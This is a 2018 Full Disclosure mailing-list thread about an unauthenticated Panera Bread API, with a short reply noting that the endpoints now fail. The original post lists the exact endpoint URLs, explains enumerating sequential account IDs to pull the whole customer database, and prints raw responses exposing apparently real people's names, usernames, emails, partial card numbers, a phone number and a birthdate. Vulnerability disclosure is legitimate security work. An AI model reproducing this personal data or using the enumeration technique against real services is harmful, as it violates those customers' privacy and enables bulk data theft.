A correction seems to be issued for both endpoints, POC links are returning
"INVALID_SESSION". Might still be breakable given some time, but something
tells me they're getting a lot of free pentesting right now :)
R. S. Tyler Schroder
-----Original Message-----
From: Fulldisclosure [mailto:[email protected]] On Behalf
Of Jack Beanstalk
Sent: Monday, April 2, 2018 3:43 PM
To: [email protected]
Subject: [FD] Massive Breach in Panera Bread
7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7
I'd like to report a security vulnerability in Panera Bread's web
application. There is a publicly available, completely unauthenticated API
endpoint that allows anyone to access the following information about anyone
who has ever signed up for an account to order food from Panera Bread:
1. Username
2. First and last name
3. Email address
4. Phone number
5. Birthday
6. Last four digits of saved credit card number
7. Saved home address
8. Social account integration information
9. Saved user food preferences and dietary restrictions
Here are the API endpoints which you can use to verify this information:
1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000
This returns the following JSON:
{"accounts": [{"username":"denys","name":"romona
ruiz","cardNumber":"********6515"},{"username":"[email protected]","name
":"Marie
Mulcahy","cardNumber":"********5527"},{"username":"[email protected]","name":"F
B","cardNumber":"********7921"},{"username":"[email protected]","name":"C
Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg
e
Alcalde","cardNumber":"********6129"},{"username":"[email protected]","na
me":"Kei
Kino","cardNumber":"********6061"},{"username":"[email protected]",
"name":"jan
jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny
poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo
ianello","cardNumber":"********8386"},{"username":"[email protected]","name"
:"Deborah
LaPerch","cardNumber":"********5384"},{"username":"[email protected]","
name":"sadie
bagnoni","cardNumber":"********5144"},{"username":"[email protected]","na
me":"Marea
needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT
ESSA
SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet
h
forlenzo","cardNumber":"********7085"},{"username":"[email protected]","nam
e":"juline
G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo
Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur
hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise
longua","cardNumber":"********0102"},{"username":"[email protected]","n
ame":"Sandra
Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia
fulchek","cardNumber":"********2654"}]}
Note that you can look up usernames/email addresses for Panera Bread
accounts if you know the target's phone number. This returns the
username/email address and last four digits of the saved credit card of
every user who has ever signed up with that phone number.
2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194
This returns the following JSON:
{"customerId":7382194,"username":"[email protected]","firstName":"Anthony","l
astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23
860763,"emailAddress":"[email protected]","emailType":"Personal","isDefault":
true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber"
:"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"
name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru
e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f
alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa
lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user
Preferences":{"foodPreferences":[{"code":3,"displayName":"Low
Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with
family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayNa
me":"Reward
Reminders & Expiration
Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ
ayName":"Panera
Bread Updates & Special
Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio
nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2
,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions"
:{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[
]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]}
In this context, "7382194" is the user's account ID. Panera Bread uses
sequential integers for account IDs, which means that if your goal is to
gather as much information as you can instead about someone, you can simply
increment through the accounts and collect as much as you'd like, up to and
including the entire database.
Hopefully they'll fix this if it gets enough attention.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
